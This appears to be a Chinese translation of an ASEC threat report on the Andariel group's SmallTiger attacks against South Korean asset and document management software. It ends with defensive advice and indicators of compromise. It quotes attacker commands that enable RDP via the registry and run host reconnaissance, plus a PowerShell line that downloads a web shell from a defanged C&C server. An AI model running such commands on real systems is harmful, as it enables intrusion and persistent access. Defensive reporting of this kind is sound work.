针对韩国解决方案的攻击案例分析-780x470.webp)
Andariel 组织自过去以来一直在攻击韩国公司使用的各种软件值得注意的是,其中包括资产管理解决方案和数据丢失防护(DLP)解决方案,而其他各种解决方案中也发现了漏洞攻击案例。
2024年下半年,Andariel集团的攻击案例仍在继续,主要安装SmallTiger。被利用的软件的一个主要例子是已被利用多年的韩国资产管理解决方案,并且也有迹象表明涉及文档集中化解决方案的利用。
1. 针对韩国资产管理解决方案的攻击案例
资产管理解决方案在攻击中不断被利用,根据其性质,可以推测控制服务器被攻陷后,威胁行为者会利用它来执行恶意软件安装命令。在大多数此类攻击案例中,都会安装 ModeLoader。
此外,还曾发生过通过暴力破解和字典攻击来夺取暴露的更新服务器控制权的案例。在该案例中,威胁行为者用 SmallTiger 替换了更新程序,并试图通过此过程将 SmallTiger 分发到组织内的系统中。
在最近发现的案例中,虽然尚未发现初始访问方法或具体分发方法,但 SmallTiger 安装在资产管理解决方案的安装路径中,同时还使用了键盘记录器。键盘记录器的独特之处在于它将用户的击键存储在相同路径下的“MsMpLog.tmp”文件中。
图 1. 键盘记录数据
威胁行为者使用 SmallTiger 配置系统以允许将来通过 RDP 访问受感染系统。用于激活 RDP 的以下命令是通过 SmallTiger 执行的。此外,还安装了一个名为 CreateHiddenAccount 的开源工具来添加和隐藏后门帐户。
| > reg 添加“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server”/v fDenyTSConnections /t REG_DWORD /d 0 /f |
图2. 通过 SmallTiger 执行的 RDP 激活命令
2. 针对文档管理解决方案的攻击案例
最近,有迹象表明,针对韩国文档管理解决方案的攻击已经出现。该解决方案使用的 Apache Tomcat Web 服务器都是旧版本,据推测威胁行为者的目标是尚未应用最新更新的位置。
图 3. 安装了韩文文档管理解决方案的受感染 Web 服务器
初次访问后,威胁行为者查询了基本系统信息,并且还有安装高级端口扫描器的记录。
| > ping 20.20.100.32 <br>> 任务列表 <br>> ipconfig /all <br>> netstat -noa <br>> whoami |
推测随后会使用如下PowerShell命令安装WebShell,目前还无法下载,但下载服务器“45.61.148[.]153”也被识别为上述攻击案例中SmallTiger的C&C服务器地址。
| powershell.exe (New-Object System.Net.WebClient).DownloadFile('hxxp://45.61.148[.]153/pizza.jsp','C:*\web*\threadstate.jsp') |
3. 结论
ASEC 最近证实,Andariel 集团正在使用 SmallTiger 恢复攻击。该集团自过去以来一直在利用各种韩国解决方案或攻击漏洞来安装恶意软件。最近发现的攻击案例涉及对资产管理解决方案的持续利用以及新发现的针对韩国文档管理解决方案的攻击迹象。
企业安全管理人员应加强对资产管理解决方案或文档管理解决方案等集中管理解决方案的监控,对存在安全漏洞的程序及时打上补丁,并及时对操作系统和浏览器等程序打上最新补丁,将V3更新至最新版本,以防恶意软件感染。
MD5
3525a8a16ce8988885d435133b3e85d8
45ef2e621f4c530437e186914c7a9c62
6a58b52b184715583cda792b56a0a1ed
b500a8ffd4907a1dfda985683f1de1df
URL
http[:]//45[.]61[.]148[.]153/pizza[.]jsp
IP
45[.]61[.]148[.]153
新间谍软件被曝光-390x220.jpg)
